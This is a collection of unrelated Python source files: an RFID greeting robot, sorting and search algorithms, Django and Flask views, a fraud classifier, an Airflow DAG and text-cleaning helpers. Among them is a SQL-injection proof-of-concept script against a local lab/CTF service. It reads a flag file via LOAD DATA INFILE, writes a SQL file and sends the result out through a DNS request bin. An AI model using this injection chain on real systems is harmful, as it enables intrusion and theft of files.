#0.6 : config dans un seul fichier avec configparser
#0.5 : la base de données permet de catégoriser les cartes (cf card2data.v0.3)
#----- on teste la présence du fichier "donnes"
#----- on sort proprement si la connexion avec Tino n'est pas effectuée
#----- on va chercher le port dans un fichier texte
#0.4 : les prénoms sont stockés dans une base de données (cf card2data)
#0.3 : les prénoms sont dans un tableau
#0.2 : on empêche qu'une carte soit présentée 2 fois de suite
# Library imports
#import sys
import configparser
import time
from datetime import datetime
import serial
from serial import SerialException
import os.path
import win32com.client
speaker = win32com.client.Dispatch("SAPI.SpVoice")  # Windows text-to-speech
import tino_fonctions
# Global variables
seq = []  # bytes of the serial line currently being received
vu = False  # True once the greeting question has been asked
joined_seq_vu=""  # last card frame handled (prevents repeating a card)
jours = ["lundi", "mardi", "mercredi", "jeudi", "vendredi", "samedi", "dimanche"]
today = jours[time.localtime()[6]]  # weekday name (Monday == index 0)
now = datetime.now()
moment_journee = tino_fonctions.plage_horaire()
# Configuration: on first run create a default config and pick a serial port.
if not os.path.isfile('tino_config.cfg'):
    tino_fonctions.init_config()
    exec(compile(open("select_port.py", "rb").read(), "select_port.py", 'exec'))
cfg = configparser.ConfigParser()
cfg.read('tino_config.cfg')
monport=cfg['Start']['port']
distance=int(cfg['Start']['distance'])  # proximity threshold for the sensor
question=cfg['Messages']['question']
# Arduino connection
ser = tino_fonctions.connect_tino(monport)
# Card data initialisation
card = tino_fonctions.init_data("card_db")
# Ready to go!
speaker.Speak("Tino, Module Bonjour initialisé.")
print ("Il est ",now.hour," h", now.minute)
print (moment_journee)
continuer = 1
i = 0  # count of consecutive close-distance readings
while continuer:
    for c in ser.read():
        seq.append(chr(c))  # append each received byte to the line buffer
        # Build a string from the buffer, dropping the trailing CR/LF pair.
        joined_seq = ''.join(str(v) for v in seq[:-2])
        if chr(c) == '\n' :
            ser.reset_input_buffer()
            if joined_seq.startswith("c:"):
                # It is an RFID card frame.
                for key in card.keys():
                    idcard = joined_seq[2:len(joined_seq)]  # strip the "c:" prefix
                    # Skip a card presented twice in a row.
                    if idcard == key and joined_seq_vu!=joined_seq:
                        print(card[key]['nom'])
                        dire = card[key]['nom']
                        if card[key]['cat']=="prenom":
                            # First-name card: greet the person.
                            dire = "Bonjour",card[key]['nom']
                        elif card[key]['nom']=="triste":
                            # Emotion cards change the robot's face instead of speaking.
                            ser.write(b'triste\n')
                            dire = ""
                        elif card[key]['nom']=="neutre":
                            ser.write(b'neutre\n')
                            dire = ""
                        elif card[key]['nom']=="sourir":
                            ser.write(b'sourir\n')
                            dire = ""
                        elif card[key]['nom']=="bee":
                            ser.write(b'bee\n')
                            dire = ""
                        elif card[key]['cat']=="jour":
                            # Weekday card: confirm whether it matches today.
                            if card[key]['nom']==today:
                                dire = "Nous sommes",card[key]['nom']
                            else:
                                dire = "Nous ne sommes pas",card[key]['nom']
                        else:
                            dire = card[key]['nom']
                        speaker.Speak(dire)
                        joined_seq_vu=joined_seq
                        vu = False
            if joined_seq.startswith("d:"):
                # It is a distance frame (hex value after the "d:" prefix).
                dist = joined_seq[2:len(joined_seq)]
                if int(dist,16) < distance and not vu:
                    i += 1
                    # Require two consecutive close readings before asking.
                    if i > 1:
                        ser.write(b'vu\n')
                        print (question)
                        speaker.Speak(question)
                        joined_seq_vu=""
                        vu=True
                else:
                    i = 0
            seq = []  # empty the line buffer
|
from datetime import datetime
def getMerraStream( date ):
    """
    Get data stream prefix for files based on date
    See page 19 of https://gmao.gsfc.nasa.gov/pubs/docs/Bosilovich785.pdf
    for more information
    Arguments:
        date (datetime) : Date corresponding to data
    Keywords:
        None.
    Returns:
        str : Prefix for file with stream; e.g., MERRA2_100
    """
    # Stream boundaries, newest first; the first boundary at or before
    # `date` wins, defaulting to the oldest stream (100).
    boundaries = (
        (datetime(2011, 1, 1, 0), 400),
        (datetime(2001, 1, 1, 0), 300),
        (datetime(1992, 1, 1, 0), 200),
    )
    stream = 100
    for start, candidate in boundaries:
        if date >= start:
            stream = candidate
            break
    return 'MERRA2_{}'.format(stream)
|
from rest_framework_mongoengine import routers
from employee.views import EmployeeView
# DRF router auto-generates the CRUD routes for the Employee viewset under
# the /employee/ prefix.
router = routers.DefaultRouter()
router.register(r'employee', EmployeeView)
urlpatterns = []
urlpatterns += router.urls
|
# O(nlog(n))
def merge_sort(seq):
    """Sort seq in place (ascending) and also return it.

    Splits at the midpoint, recursively sorts each half of length > 1, then
    merges the halves back into seq. Ties are taken from the right half
    first, exactly as in the original implementation.
    """
    half = len(seq) // 2
    left, right = seq[:half], seq[half:]
    if len(left) > 1:
        merge_sort(left)
    if len(right) > 1:
        merge_sort(right)
    li = ri = out = 0
    while li < len(left) and ri < len(right):
        if left[li] >= right[ri]:
            seq[out] = right[ri]
            ri += 1
        else:
            seq[out] = left[li]
            li += 1
        out += 1
    # Copy whichever half still has leftovers.
    for leftover in left[li:]:
        seq[out] = leftover
        out += 1
    for leftover in right[ri:]:
        seq[out] = leftover
        out += 1
    return seq
def main():
    # Demo run. Note: the original printed "".join(str(seq)), which equals
    # str(seq), so printing the list directly yields identical output.
    sorted_values = merge_sort([1, 5, 3, 4, 6, 2])
    print(sorted_values)
if __name__ == '__main__':
    main()
|
# Time Complexity : O(n)
# Space Complexity : O(1)
# Did this code successfully run on Leetcode : yes
class Solution:
    def sortColors(self, nums: list[int]) -> None:
        """Dutch national flag: sort an array of 0s/1s/2s in place, one pass.

        Bug fixes vs. the original: removed the no-op comparison
        `nums[mid] == 2` that sat where a statement was expected, dropped the
        unused `res` list, and replaced the undefined `List` annotation with
        the builtin `list`.
        """
        low = 0
        high = len(nums) - 1
        mid = 0
        while mid <= high:
            if nums[mid] == 0:
                nums[mid], nums[low] = nums[low], nums[mid]
                low += 1
                mid += 1
            elif nums[mid] == 1:
                mid += 1
            else:  # nums[mid] == 2
                # mid is deliberately not advanced: the value swapped in
                # from the back still needs classifying.
                nums[mid], nums[high] = nums[high], nums[mid]
                high -= 1
|
"""
Bank account manager. Create a class called Account which will be an
abstract class for three other classes called CheckingAccount,
SavingsAccount and BusinessAccount.
For shortening i simply crate one class which inherits from Account
"""
from abc import *
class Account(object):
    # "Fake" abstraction: a plain base class — nothing stops direct
    # instantiation (contrast with RealAbstractAccout below).
    def __init__(self, id):
        self.id = id
class RealAbstractAccout(metaclass=ABCMeta):
    """Genuinely abstract account: cannot be instantiated directly."""
    # abc.abstractproperty has been deprecated since Python 3.3; stacking
    # @property over @abstractmethod is the supported equivalent.
    @property
    @abstractmethod
    def id_number(self):
        return 0
class CheckingAccount(Account):
    """Concrete account carrying an id and a display name."""
    def __init__(self, id, name):
        super(CheckingAccount, self).__init__(id)
        self.name = name
    def __str__(self):
        return "{}, {}".format(self.id, self.name)
class RealCheckingAccount(RealAbstractAccout):
    """Concrete implementation of the abstract account."""
    def __init__(self, id, name):
        # Bug fix: the original called Account.__init__, but this class
        # derives from RealAbstractAccout, not Account (a TypeError under
        # Python 2's bound-method check). Set the attribute directly.
        self.id = id
        self.name = name
    @property
    def id_number(self):
        # Satisfies the abstract id_number property of the base class.
        return self.id
    def __str__(self):
        return "%s, %s" % (self.id, self.name)
testAc = CheckingAccount(5, "10")
# print() as a function works on both Python 2 and 3; the bare
# `print testAc` statement was a SyntaxError under Python 3 (which this
# file already requires, given the `metaclass=` syntax above).
print(testAc)
|
# -*- coding: utf-8 -*-
"""
Created on Wed May 12 04:34:12 2021
@author: Zakaria
"""
import pandas as pd
data = pd.read_csv('prediction_de_fraud_2.csv')
# Features: every column except the label; target: the isFraud flag.
caracteristiques = data.drop('isFraud', axis=1).values
cible = data['isFraud'].values
from sklearn.preprocessing import LabelEncoder
# Label-encode the categorical columns (indices 1, 3 and 6).
# NOTE(review): one LabelEncoder instance is refitted per column, so its
# fitted state afterwards only reflects column 6 — harmless here since it
# is not reused, but confirm before extending.
LabEncdr_X = LabelEncoder()
caracteristiques[:, 1] = LabEncdr_X.fit_transform(caracteristiques[:, 1])
caracteristiques[:, 3] = LabEncdr_X.fit_transform(caracteristiques[:, 3])
caracteristiques[:, 6] = LabEncdr_X.fit_transform(caracteristiques[:, 6])
from sklearn.model_selection import train_test_split
# 70/30 split with a fixed seed for reproducibility.
x_train, x_test, y_train, y_test = train_test_split(caracteristiques, cible, test_size=.3, random_state=50)
from sklearn.ensemble import RandomForestClassifier
Random_frst_cls = RandomForestClassifier(random_state=50)
Random_frst_cls.fit(x_train, y_train)
Random_frst_cls.score(x_test, y_test) ## ==> 0.9550561797752809
|
from flask_login import LoginManager, login_user, logout_user, login_required, UserMixin, current_user
from app import app
login_manager = LoginManager()
#login_manager.init_app(app)
#login_manager.login_view = ''
@login_manager.user_loader
def load_user(user_id):
    # flask_login callback: rebuild the session user from its stored id.
    return User(user_id)
class User(UserMixin):
    # Minimal session user: flask_login only needs a stable `id` attribute,
    # which UserMixin's get_id() reads.
    def __init__(self,id):
        self.id = id
import re
# Build the "initials" of a hyphenated word: the first character plus the
# character following each hyphen.
A = input()
ans = ""
ans += A[0]
# Raw string avoids the invalid-escape DeprecationWarning for \w; the
# pattern is otherwise unchanged.
a = re.findall(r"-(\w)", A)
for i in a:
    ans += i
print(ans)
# Done
|
import requests
import json
# Proof-of-concept exploit for a deliberately vulnerable local lab/CTF
# target (localhost:4001); confirms the injection out-of-band via a DNS
# request bin. Do not run against systems you do not own.
base_url = "http://localhost:4001"
# step 1 -> inject sql statement to create new entry
dns_req_bin = input("Enter your dns req bin url (.url.com): ")
data = {"stockid": "416", "name": "a", "quantity": "0", "vurl": "a'); SET @f=0b001011110110100001101111011011010110010100101111011000110111010001100110001011110110011001101100011000010110011100101110011101000111100001110100; SET @w=0b0010111101101000011011110110110101100101001011110110001101110100011001100010111101100001011100000111000000101111011001000110001000101111011100100111000000101110011100110111000101101100; SET @q = CONCAT(\"LOAD DATA INFILE '\", @f, \"' INTO TABLE stock (@t) SET stockid=111, quantity=0, vurl=CONCAT(@t, '" + dns_req_bin + "');\"); SET @z = CONCAT(\"SELECT @q INTO OUTFILE '\", @w,\"'\"); PREPARE s from @z; EXECUTE s;-- "}
data_json = json.dumps(data)
headers = {"Content-Type": "application/json"}
r = requests.post(base_url + "/api/registerproduct", headers=headers, data=data_json)
print(r.text)
# step 2 -> execute sql
data = {"filename": "rp.sql"}
data_json = json.dumps(data)
headers = {"Content-Type": "application/json"}
r = requests.post(base_url + "/api/initializedb", headers=headers, data=data_json)
print(r.text)
# step 3 -> execute data
data = {"stockid": "111"}
data_json = json.dumps(data)
headers = {"Content-Type": "application/json"}
r = requests.post(base_url + "/api/notifystock", headers=headers, data=data_json)
print("Exploit complete, check reqbin")
|
from django.shortcuts import render, redirect, HttpResponse
# Using Django Messages: https://docs.djangoproject.com/en/1.11/ref/contrib/messages/#displaying-messages
from django.contrib import messages
from .models import *
from django.db.models import Count
# Create your views here.
def index(request):
    """Render the main courses page listing every course."""
    context = {"all_courses": Course.objects.all()}
    return render(request, 'courses/index.html', context)
def newCourse(request):
    """Validate the POSTed course data and create the course.

    Flow: duplicate name -> flash error, back to /courses/; field errors ->
    flash each one, back to '/'; otherwise create the course and return to
    /courses/.
    """
    errors = Course.objects.validator(request.POST)
    duplicate = Course.objects.duplicate_validator(request.POST)
    if len(duplicate) > 0:
        messages.error(request, duplicate)
        return redirect('/courses/')
    if len(errors) > 0:
        for k, v in errors.items():
            messages.error(request,v)
        # NOTE(review): this error path redirects to '/' while the duplicate
        # path above uses '/courses/' — confirm the inconsistency is intended.
        return redirect('/')
    else:
        # NOTE(review): success message is flashed before the create() call;
        # if create() raises, the user still sees "Course added!".
        messages.success(request, "Course added!")
        Course.objects.create(name=request.POST['name'], desc=request.POST['desc'])
        return redirect('/courses/')
def destroyCourse(request, id):
    """Show the delete-confirmation page for a single course."""
    course_to_delete = Course.objects.get(id=id)
    return render(request, "courses/destroy.html", {"course": course_to_delete})
def userCourses(request):
    """Render the page for assigning users to courses."""
    # Removed an unused `Course.objects.annotate(num_users=Count(...))`
    # queryset that was computed but never passed to the template (lazy
    # queryset, so dropping it cannot change behaviour).
    context = {
        "all_courses": Course.objects.all(),
        "all_users": User.objects.all(),
    }
    return render(request, "courses/user_courses.html", context)
def addUserToCourse(request):
    """Attach the session's current user to the POSTed course (m2m add)."""
    thisUser = User.objects.get(id=request.session['cur_user'])
    thisClass = Course.objects.get(id=request.POST['course'])
    thisClass.users_in_course.add(thisUser)
    # NOTE(review): ManyToMany .add() commits immediately, so this save()
    # is likely redundant — confirm before removing.
    thisClass.save()
    return redirect('/courses/userCourses/')
def deleteCourse(request, id):
    """Delete the course with the given id, then return to the course list."""
    Course.objects.get(id=id).delete()
    return redirect('/courses/')
|
# Module metadata (picked up by help() and some packaging tools).
__author__ = "snoww0lf@Noobs1337"
__copyright__ = "Copyright (C) 2015 snoww0lf"
__license__ = "MIT License"
from datetime import datetime
from django.test import TestCase
from django.urls import reverse
from api.tools import date2fraction, fraction2date, format_inline_time
class DatesTestCase(TestCase):
    """Round-trip tests for the date <-> year-fraction helpers in api.tools."""
    def test_date2fraction(self):
        """
        Test the output of date2fraction
        """
        # Inline timestamps (YYYYMMDDHHMMSS) mapped to the expected
        # day-of-year fraction.
        expected = {
            '20150101120000' : 0.5,
            '20150102120000' : 1.5,
            '20151231000000' : 364,
        }
        for inline_time in expected:
            time = format_inline_time(inline_time)
            fraction = date2fraction(time)
            # assertEquals is a deprecated alias; assertEqual is canonical.
            self.assertEqual(fraction, expected[inline_time])
    def test_fraction2date(self):
        """
        Test the output of fraction2date
        """
        expected = {
            0.5 : '20150101120000',
            1.5 : '20150102120000',
            364 : '20151231000000',
        }
        for day in expected:
            calc_time = fraction2date(day)
            time = format_inline_time(expected[day])
            # NOTE(review): minutes (and year) are not compared here — only
            # month/day/hour/second. Confirm whether that is deliberate.
            self.assertTrue(
                calc_time.month == time.month and
                calc_time.day == time.day and
                calc_time.hour == time.hour and
                calc_time.second == time.second,
                "{} != {}".format(calc_time, time)
            )
|
def binarySearch(arr, l, r, x):
    """Recursive binary search for x in sorted arr over the inclusive range
    [l, r]; returns the index of x, or -1 when absent.

    Bug fixes vs. the original:
    * `r > l` skipped one-element ranges, so values whose range narrowed to
      a single index (e.g. 35 when called from exponentialSearch) were
      reported missing; use `r >= l`.
    * Bounds are coerced to int and midpoint uses // — the caller passes a
      float lower bound (`i/2`).
    * r is clamped to len(arr) - 1, because exponentialSearch may pass
      r == len(arr).
    """
    l = int(l)
    r = min(int(r), len(arr) - 1)
    if r >= l:
        mid = l + (r - l) // 2
        # if element is present at the middle itself
        if arr[mid] == x:
            return mid
        # if element is smaller then it will be available in left sub array
        if arr[mid] > x:
            return binarySearch(arr, l, mid - 1, x)
        # if element is greater than mid
        return binarySearch(arr, mid + 1, r, x)
    return -1
def exponentialSearch(arr,n,x):
    """Exponential search for x in the sorted array arr of length n.

    Doubles an upper bound i until arr[i] > x, then binary-searches the
    bracket [i//2, min(i, n)]. Returns the index of x, or -1.
    """
    # if x is present at 0th position
    if arr[0] == x:
        return 0
    # find range of binary search
    i = 1
    while i <n and arr[i] <=x:
        i = i*2
    # NOTE(review): i/2 is float division, and min(i, n) can hand an
    # out-of-range upper bound (n == len(arr)) to binarySearch — the callee
    # is expected to tolerate both; confirm against its implementation.
    return binarySearch(arr,i/2,min(i,n),x)
# Demo: search for a value larger than every element -> reported not found.
arr = [2,4,35,45,56,66,76,87,89]
n = len(arr)
x = 90
result = exponentialSearch(arr,n,x)
if result == -1:
    print("Element not found")
else:
    # Typo fix: "ELement" -> "Element".
    print("Element found at: ",result)
|
from flask import Flask, render_template, request
import joblib
import requests
import xgboost as xgb
import numpy as np
import sklearn
app = Flask(__name__)
# Load the trained XGBoost password-strength classifier from its native
# JSON checkpoint.
model=xgb.XGBClassifier()
model.load_model("xgb_classifier.json")
# Function to separate the characters of a password (vectorizer tokenizer)
import __main__
def word_divide_char(inputs):
    """Tokenizer used by the pickled vectorizer: one character per token."""
    return [character for character in inputs]
# Re-register the tokenizer on __main__: the vectorizer was pickled from a
# script, so joblib resolves word_divide_char there when unpickling.
__main__.word_divide_char=word_divide_char
#model = pickle.load(open('xgb_pwd_model.pkl', 'rb'))
#vectorizer= pickle.load(open('vectorizer.pkl', 'rb'))
vectorizer=joblib.load("vectorizer.sav")
@app.route('/',methods=['GET'])
def Home():
    # Landing page carrying the password form.
    return render_template('index.html')
@app.route("/predict", methods=['POST'])
def predict():
    """Classify the submitted password as weak/medium/strong (labels 0/1/2)."""
    if request.method == 'POST':
        pwd = request.form['pwd']
        # Vectorize with the same character-level vectorizer used at training.
        X_predict=[pwd]
        X_predict=vectorizer.transform(X_predict)
        prediction=model.predict(X_predict)
        if prediction==0:
            prediction_text='Weak Password'
        elif prediction==1:
            prediction_text='Medium Strength Password'
        else:
            prediction_text='Strong Password'
        return render_template('index.html',prediction_text=prediction_text)
    else:
        # Unreachable in practice: the route only accepts POST.
        return render_template('index.html')
if __name__=="__main__":
    # Debug server for local development only.
    app.run(debug=True)
|
from dataclasses import fields
from typing import List
import datetime
from cryptography.x509 import NameAttribute, NameOID, BasicConstraints
from com.SelfOneDrive.WebmanagementSystem.Domain.Model.CertData import CertData
from com.SelfOneDrive.WebmanagementSystem.FileSystem.FileSystemProvider import FileSystemProvider
from flask import Flask, request, jsonify
from .CertificateGenerator.SelfSignedCertificateGenerator import SelfSignedCertificateGenerator
from .CertificateGenerator.CertDataValidator import CertDataValidator
from .Domain.Repository.CertificateRepository import CertificateRepository
from .Domain.Repository.KeyRepository import KeyRepository
def create_app(test_config=None):
    """Application factory: wires up the certificate/key repositories and
    exposes the REST endpoints for creating self-signed CAs.

    Args:
        test_config: accepted for the conventional Flask-factory signature;
            currently unused.
    """
    app = Flask(__name__)
    # Collaborators shared by every request of this app instance.
    certDataValidator = CertDataValidator()
    sscGenerator = SelfSignedCertificateGenerator()
    certRepository = CertificateRepository()
    keyRepository = KeyRepository()
    with app.app_context():
        # Ensure the storage directories exist before any request arrives.
        fsManager = FileSystemProvider()
        fsManager.check_prerequisite()
    @app.route("/api/v1/certauths", methods=['POST'])
    def createNewCert():
        """Create a CA certificate + private key from the POSTed JSON body."""
        jsonData = request.get_json()
        certData = CertData(**jsonData)
        if certDataValidator.dataObjectContainsAllInformation(certData):
            app.logger.info("Daten sind volständig")
            # Subject/issuer name of the CA, built from the request fields
            # (see cryptography.x509 NameOID for the attribute meanings).
            ca_information: List[NameAttribute] = [
                NameAttribute(NameOID.COUNTRY_NAME, certData.country_name),
                NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, certData.state_or_province_name),
                NameAttribute(NameOID.LOCALITY_NAME, certData.local_city_name),
                NameAttribute(NameOID.COMMON_NAME, certData.common_name),
                NameAttribute(NameOID.ORGANIZATION_NAME, certData.organization_name),
                NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, certData.organization_unit_name),
            ]
            # BasicConstraints(True, None): mark as a CA with no path-length limit.
            privateKey, certificate = sscGenerator.generate_Certificate_Authority(
                ca_information,
                datetime.datetime.utcnow() + datetime.timedelta(days=certData.validation_range),
                BasicConstraints(True, None)
            )
            keySuccessfullySaved = keyRepository.persistOne(certData.persistence_identifier, privateKey)
            certSuccessfullySaved = certRepository.persistOne(certData.persistence_identifier, certificate)
            if keySuccessfullySaved and certSuccessfullySaved:
                return jsonify({"successful": True})
            else:
                # NOTE(review): key is spelled "succesful" here but
                # "successful" elsewhere — clients checking the flag will
                # miss this branch; confirm and unify.
                return jsonify({"succesful": False})
        else:
            return jsonify({"successful": False})
    @app.route("/api/v1/sslconfigs")
    def getAllSslConfigs():
        # Placeholder endpoint — not implemented yet.
        return "getAllSSLConfigs"
    return app
import datetime
import os
from airflow import models
from airflow.contrib.operators import dataproc_operator
from airflow.utils import trigger_rule
# Start "yesterday" at midnight so Airflow schedules the first run immediately.
yesterday = datetime.datetime.combine(
    datetime.datetime.today() - datetime.timedelta(1),
    datetime.datetime.min.time())

default_dag_args = {
    # Setting start date as yesterday starts the DAG immediately when it is
    # detected in the Cloud Storage bucket.
    'start_date': yesterday,
    # To email on failure or retry set 'email' arg to your email and enable
    # emailing here.
    'email_on_failure': False,
    'email_on_retry': False,
    # If a task fails, retry it once after waiting at least 5 minutes
    'retries': 1,
    'retry_delay': datetime.timedelta(minutes=5),
    'project_id': os.environ['PROJECT_ID']
}

# Templated with the schedule date ({{ ds_nodash }}) so each run gets a unique cluster.
pipeline_cluster_name = 'cluster-2-compute-pi-{{ ds_nodash }}'

with models.DAG(
        'Compute-PI',
        # Continue to run DAG once per day
        schedule_interval=datetime.timedelta(days=1),
        default_args=default_dag_args) as dag:

    # Create a Cloud Dataproc cluster.
    create_dataproc_cluster = dataproc_operator.DataprocClusterCreateOperator(
        task_id='create_dataproc_cluster',
        # Give the cluster a unique name by appending the date scheduled.
        # See https://airflow.apache.org/code.html#default-variables
        cluster_name=pipeline_cluster_name,
        num_workers=2,
        region='us-central1',
        # NOTE(review): "ephimeral" looks misspelled, but it is part of the real
        # resource path — confirm the policy's actual name before changing it.
        autoscaling_policy='projects/{}/regions/us-central1/autoscalingPolicies/ephimeral-scaling-policy'.format(os.environ['PROJECT_ID']),
        master_machine_type='n1-standard-1',
        worker_machine_type='n1-standard-1')

    # Run the PySpark job stored in the Composer bucket; NUM_SAMPLES comes
    # from an Airflow Variable.
    run_py_spark = dataproc_operator.DataProcPySparkOperator(
        task_id='run_py_spark',
        region='us-central1',
        main='gs://{}/data/compute-pi-pipeline/calculate-pi.py'.format(os.environ['COMPOSER_BUCKET']),
        arguments=[ models.Variable.get("NUM_SAMPLES") ],
        cluster_name=pipeline_cluster_name
    )

    # Delete Cloud Dataproc cluster.
    delete_dataproc_cluster = dataproc_operator.DataprocClusterDeleteOperator(
        task_id='delete_dataproc_cluster',
        region='us-central1',
        cluster_name=pipeline_cluster_name,
        # Setting trigger_rule to ALL_DONE causes the cluster to be deleted
        # even if the Dataproc job fails.
        trigger_rule=trigger_rule.TriggerRule.ALL_DONE)

    # Define DAG dependencies.
    create_dataproc_cluster >> run_py_spark >> delete_dataproc_cluster
# [END composer_hadoop_steps]
def weather(temp=70):
    """Print and return a description of the weather for *temp*.

    Args:
        temp: temperature to classify; defaults to 70 to preserve the
            original hard-coded behavior.

    Returns:
        The message that was printed.
    """
    if temp >= 90:
        msg = "it is hot outside"
    # BUG FIX: the original condition was `a < 90 or a > 60`, which is true for
    # every temperature, so the "chilly" branch was unreachable.
    elif temp > 60:
        msg = "it is warm outside"
    else:
        msg = "it is chilly outside"
    print(msg)
    return msg


weather()
# coding: utf-8
# In[67]:
import regex as re,string
import nltk
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
stop_words = set(stopwords.words('english'))
from nltk.stem import PorterStemmer
stemmer= PorterStemmer()
from nltk.stem import WordNetLemmatizer
lemmatizer=WordNetLemmatizer()
# In[ ]:
def clear_blank_lines(file):
    """Read *file* and return its lines (newlines kept) with blank lines removed."""
    with open(file, 'r') as handle:
        kept = [line for line in handle if line.rstrip()]
    return kept
def strip_all(data, x='.\n'):
    """Strip the characters in *x* (default ".\\n") from both ends of every item."""
    stripped = []
    for item in data:
        stripped.append(item.strip(x))
    return stripped
def lower_all(data):
    """Return a copy of *data* with every string lower-cased."""
    return list(map(str.lower, data))
def remove_numbers(data):
    """Strip every digit run from each string in *data*."""
    digit_run = re.compile(r'[0-9]+')
    return [digit_run.sub('', entry) for entry in data]
def remove_symblos(data):
    """Drop every character that is neither word (alnum/underscore) nor whitespace."""
    cleaned = []
    for entry in data:
        cleaned.append(re.sub(r'[^\w\s]', '', entry))
    return cleaned
def remove_stpwrds(data):
    """Tokenize each string and drop English stop words; returns a list of token lists."""
    result = []
    for sentence in data:
        result.append([tok for tok in word_tokenize(sentence) if tok not in stop_words])
    return result
def token_it(data):
    """Tokenize each string in *data*; returns a list of token lists."""
    return [list(word_tokenize(sentence)) for sentence in data]
def stemming(data):
    """Apply the Porter stemmer to every token of every sentence (e.g. "dogs" -> "dog")."""
    result = []
    for sentence in data:
        result.append([stemmer.stem(tok) for tok in sentence])
    return result
def lemming(data):
    """Apply WordNet lemmatization to every token of every sentence."""
    return [list(map(lemmatizer.lemmatize, sentence)) for sentence in data]
def main_cleaner(file, op='sents'):
    """Run the full cleaning pipeline on the text file *file*.

    Args:
        file: path to the text file to clean.
        op: 'sents' for a list of cleaned token lists (one per line),
            'words' for a single flat list of tokens.

    Returns:
        Cleaned tokens, or an error-message string for an invalid *op*.
    """
    # Line-level cleaning: drop blanks, strip, lower-case, remove digits and symbols.
    part1 = remove_symblos(remove_numbers(lower_all(strip_all(clear_blank_lines(file)))))
    # Word-level cleaning: stop-word removal, stemming, lemmatization.
    part2 = lemming(stemming(remove_stpwrds(part1)))
    if op == 'sents':
        return part2
    if op == 'words':
        return [word for sent in part2 for word in sent]
    # BUG FIX: the original guard `if op != 'sents' or 'words':` was always true
    # because the non-empty string 'words' is truthy; the intended check is that
    # *op* matched neither supported option (which is guaranteed here).
    return "value of option is not valid, try 'sents' or 'words' instead"
|
"""
https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/
105. Construct Binary Tree from Preorder and Inorder Traversal
Given two integer arrays preorder and inorder where preorder is the preorder traversal of a binary tree and inorder is the inorder traversal of the same tree, construct and return the binary tree.
Input: preorder = [3,9,20,15,7], inorder = [9,3,15,20,7]
Output: [3,9,20,null,null,15,7]
"""
from typing import List
# Definition for a binary tree node.
class TreeNode:
    """Binary-tree node holding a value and optional left/right children."""

    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right
class Solution:
    """LeetCode 105: rebuild a binary tree from its preorder + inorder traversals."""

    def buildTree(self, preorder: List[int], inorder: List[int]) -> 'TreeNode':
        """Return the root of the tree whose traversals are *preorder*/*inorder*.

        Assumes both lists describe the same tree and values are unique
        (guaranteed by the problem statement).
        """
        # CLEANUP: removed a stray debug print of the inputs and several
        # blocks of commented-out debug prints from the original.
        def create_tree(preorder, inorder):
            # Empty slice -> no subtree.
            if not preorder:
                return None
            # The first preorder element is always the subtree root.
            root = TreeNode(preorder[0])
            if len(preorder) == 1:
                return root
            # Everything left of the root in inorder is the left subtree.
            split = inorder.index(preorder[0])
            left_in = inorder[:split]
            right_in = inorder[split + 1:]
            root.left = create_tree(preorder[1:1 + len(left_in)], left_in)
            root.right = create_tree(preorder[1 + len(left_in):], right_in)
            return root

        return create_tree(preorder, inorder)
# Smoke tests: rebuild two sample trees from their traversals.
preorder = [1,2]
inorder = [2,1]
ans = Solution().buildTree(preorder, inorder)
preorder = [3,9,20,15,7]
inorder = [9,3,15,20,7]
ans = Solution().buildTree(preorder, inorder)
|
from django.views import generic
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.urls import reverse
from django import forms
from .models import Crag, Route, NameStory, Anecdote
from crags.enums import RouteType, Grade
from django_countries.fields import CountryField
from django.contrib.auth.decorators import login_required
from django.utils.translation import gettext_lazy as _
class HomeView(generic.TemplateView):
    """Site landing page."""
    template_name = 'crags/home.html'


class IndexCragView(generic.ListView):
    """List of all crags."""
    model = Crag
    template_name = 'crags/crag_index.html'


class DetailCragView(generic.DetailView):
    """Crag detail page, including all of the crag's routes."""
    model = Crag
    template_name = 'crags/crag_detail.html'

    def get_context_data(self, **kwargs):
        # Call the base implementation first to get a context
        context = super().get_context_data(**kwargs)
        #crag = Crag.objects.get(id=self.kwargs.get('pk', ''))
        # Expose the crag's routes to the template via the reverse relation.
        context['route_list'] = self.object.route_set.all()
        return context


class IndexRouteView(generic.DetailView):
    """Route detail page (named Index* but renders a single route)."""
    model = Route
    template_name = 'crags/route_detail.html'


class ResultsCragView(generic.DetailView):
    """Crag results page."""
    model = Crag
    template_name = 'crags/detail.html'


class IndexAnecdoteView(generic.ListView):
    """Paginated list of anecdotes."""
    model = Anecdote
    template_name = 'crags/index.html'
    context_object_name = 'anecdote_list'
    paginate_by = 15


class DetailAnecdoteView(generic.DetailView):
    """Anecdote detail page (uses Django's default template name)."""
    model = Anecdote


class DetailNameStoryView(generic.DetailView):
    """Name-story detail page (uses Django's default template name)."""
    model = NameStory
    # template_name = 'stories/name_story_detail.html'
class AnecdoteForm(forms.Form):
    """Free-text anecdote about a route, with its source."""
    anecdote = forms.CharField(label=_("Anecdote"), max_length=5000, widget=forms.Textarea)
    source = forms.CharField(label=_("Source"), max_length=500)


class NameStoryForm(forms.Form):
    """Story behind a route's name, with its source."""
    story = forms.CharField(label=_("Story"), max_length=5000, widget=forms.Textarea)
    source = forms.CharField(label=_("Source"), max_length=500)


class CragForm(forms.Form):
    """Minimal crag creation form (name + country)."""
    name = forms.CharField(label=_("Name"), max_length=500)
    country = CountryField().formfield()


class RouteForm(forms.Form):
    """Route creation form; dates use select-box widgets."""
    name = forms.CharField(label=_("Name"), max_length=500)
    type = forms.ChoiceField(label=_("Type"), choices=RouteType.choices())
    description = forms.CharField(label=_("Description"), max_length=5000, widget=forms.Textarea)
    openIn = forms.DateField(label=_("Opening date"), widget=forms.SelectDateWidget)
    faIn = forms.DateField(label=_("First ascent date"), widget=forms.SelectDateWidget)
@login_required
def add_anecdote_view(request, pk_crag, pk_route):
    """Show (GET) or process (POST) the form adding an anecdote to a route."""
    route = get_object_or_404(Route, pk=pk_route)
    if request.method != 'POST':
        form = AnecdoteForm()
    else:
        form = AnecdoteForm(request.POST)
        if form.is_valid():
            anecdote = Anecdote(
                route=route,
                anecdote=form.cleaned_data['anecdote'],
                source=form.cleaned_data['source'],
                isValidated=False,
            )
            anecdote.save()
            return HttpResponseRedirect(reverse('crags:route_detail', args=[pk_crag, pk_route]))
    # Invalid POST falls through with the bound form so errors are displayed.
    return render(request, 'crags/anecdote_create.html', {'form': form, 'route': route})
@login_required
